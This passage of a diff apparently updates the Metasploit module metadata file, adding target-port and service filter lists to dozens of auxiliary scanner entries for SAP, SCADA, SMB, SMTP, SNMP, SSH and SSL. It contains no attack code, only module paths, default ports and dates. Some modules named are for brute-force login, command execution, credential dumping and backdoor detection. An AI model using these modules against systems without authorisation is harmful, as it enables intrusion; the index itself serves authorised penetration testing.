"rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb", @@ -24727,6 +33701,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb", @@ -24756,6 +33746,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb", @@ -24785,6 +33791,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb", @@ -24815,6 +33837,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb", @@ -24845,6 +33883,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb", @@ -24874,6 +33928,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb", @@ -24903,6 +33973,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb", @@ -24932,6 +34018,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb", @@ -24961,6 +34063,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb", @@ -24990,6 +34108,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb", @@ -25022,6 +34156,12 @@ "platform": "", "arch": "", "rport": 3299, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_router_info_request.rb", @@ -25056,6 +34196,12 @@ "platform": "", "arch": "", "rport": "3299", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_router_portscanner.rb", @@ -25085,6 +34231,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_service_discovery.rb", @@ -25116,6 +34268,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_smb_relay.rb", @@ -25146,6 +34313,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb", @@ -25176,6 +34358,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb", @@ -25206,6 +34403,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb", @@ -25236,6 +34448,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb", @@ -25265,6 +34492,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb", @@ -25297,6 +34539,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb", @@ -25327,6 +34584,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb", @@ -25357,6 +34629,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb", @@ -25388,6 +34675,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb", @@ -25418,6 +34720,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb", @@ -25448,6 +34765,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb", @@ -25478,6 +34810,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb", @@ -25510,6 +34857,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb", @@ -25540,6 +34902,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb", @@ -25569,6 +34946,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb", @@ -25599,6 +34991,12 @@ "platform": "", "arch": "", "rport": 2362, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/digi_addp_reboot.rb", @@ -25629,6 +35027,12 @@ "platform": "", "arch": "", "rport": 2362, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/digi_addp_version.rb", @@ -25659,6 +35063,12 @@ "platform": "", "arch": "", "rport": 771, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb", @@ -25689,6 +35099,12 @@ "platform": "", "arch": "", "rport": 771, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/digi_realport_version.rb", @@ -25722,6 +35138,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb", @@ -25752,6 +35183,12 @@ "platform": "", "arch": "", "rport": 28784, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/koyo_login.rb", @@ -25782,6 +35219,12 @@ "platform": "", "arch": "", "rport": 502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/scada/modbus_findunitid.rb", @@ -25814,6 +35257,12 @@ "platform": "", "arch": "", "rport": 502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/modbusclient.rb", @@ -25844,6 +35293,12 @@ "platform": "", "arch": "", "rport": 502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/modbusdetect.rb", @@ -25875,6 +35330,12 @@ "platform": "", "arch": "", "rport": 4800, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/moxa_discover.rb", @@ -25905,6 +35366,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/profinet_siemens.rb", @@ -25939,6 +35406,12 @@ "platform": "", "arch": "", "rport": 46824, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb", @@ -25968,6 +35441,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sip/enumerator.rb", @@ -25997,6 +35476,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sip/enumerator_tcp.rb", @@ -26026,6 +35511,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sip/options.rb", @@ -26055,6 +35546,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sip/options_tcp.rb", @@ -26085,6 +35582,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb", @@ -26118,6 +35621,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/smb/impacket/dcomexec.py", @@ -26162,6 +35671,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/smb/impacket/secretsdump.py", @@ -26195,6 +35710,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py", @@ -26227,6 +35748,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-03-22 06:41:58 +0000", "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb", @@ -26256,6 +35785,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb", @@ -26288,6 +35825,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb", @@ -26317,6 +35862,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-18 15:02:38 +0000", "path": "/modules/auxiliary/scanner/smb/smb1.rb", @@ -26346,6 +35897,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/smb2.rb", @@ -26379,6 +35936,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-09-10 15:04:22 +0000", "path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb", @@ -26412,6 +35977,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-09-11 19:05:26 +0000", "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb", @@ -26441,6 +36014,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb", @@ -26471,6 +36052,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb", @@ -26503,6 +36092,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-07-25 15:13:41 +0000", "path": "/modules/auxiliary/scanner/smb/smb_login.rb", @@ -26532,6 +36129,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-10-20 15:32:25 +0000", "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb", @@ -26571,6 +36176,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-08-27 13:11:22 +0000", "path": "/modules/auxiliary/scanner/smb/smb_ms17_010.rb", @@ -26610,6 +36223,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/smb_uninit_cred.rb", @@ -26639,6 +36260,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-05-07 00:13:11 +0000", "path": "/modules/auxiliary/scanner/smb/smb_version.rb", @@ -26671,6 +36300,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smtp/smtp_enum.rb", @@ -26700,6 +36341,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb", @@ -26731,6 +36384,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb", @@ -26760,6 +36425,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smtp/smtp_version.rb", @@ -26790,6 +36467,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/aix_version.rb", @@ -26820,6 +36503,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-09 12:56:00 +0000", "path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb", @@ -26849,6 +36538,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb", @@ -26879,6 +36574,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb", @@ -26908,6 +36609,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/cisco_upload_file.rb", @@ -26938,6 +36645,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-18 17:11:47 +0000", "path": "/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.rb", @@ -26969,6 +36682,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-18 17:03:13 +0000", "path": "/modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb", @@ -26998,6 +36717,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb", @@ -27029,6 +36754,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/snmp/sbg6580_enum.rb", @@ -27060,6 +36791,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb", @@ -27093,6 +36830,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb", @@ -27122,6 +36865,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb", @@ -27151,6 +36900,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb", @@ -27180,6 +36935,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_login.rb", @@ -27211,6 +36972,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_set.rb", @@ -27240,6 +37007,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb", @@ -27269,6 +37042,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb", @@ -27298,6 +37077,12 @@ "platform": "Unix", "arch": "cmd", "rport": 8101, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-15 06:48:35 +0000", "path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb", @@ -27329,6 +37114,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-15 06:48:35 +0000", "path": "/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb", @@ -27359,6 +37150,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-26 15:43:10 +0000", "path": "/modules/auxiliary/scanner/ssh/detect_kippo.rb", @@ -27393,6 +37190,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb", @@ -27425,6 +37228,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-15 06:48:35 +0000", "path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb", @@ -27458,6 +37267,12 @@ "platform": "", "arch": "", "rport": 8101, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ssh/karaf_login.rb", @@ -27498,6 +37313,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/ssh/ssh_enumusers.rb", @@ -27529,6 +37350,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-15 14:59:52 +0000", "path": "/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb", @@ -27558,6 +37385,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-08 21:23:11 +0000", "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb", @@ -27588,6 +37421,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-12 20:14:08 +0000", "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb", @@ -27617,6 +37456,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ssh/ssh_version.rb", @@ -27662,6 +37507,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py", @@ -27701,6 +37552,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ssl/openssl_ccs.rb", @@ -27749,6 +37606,12 @@ "platform": 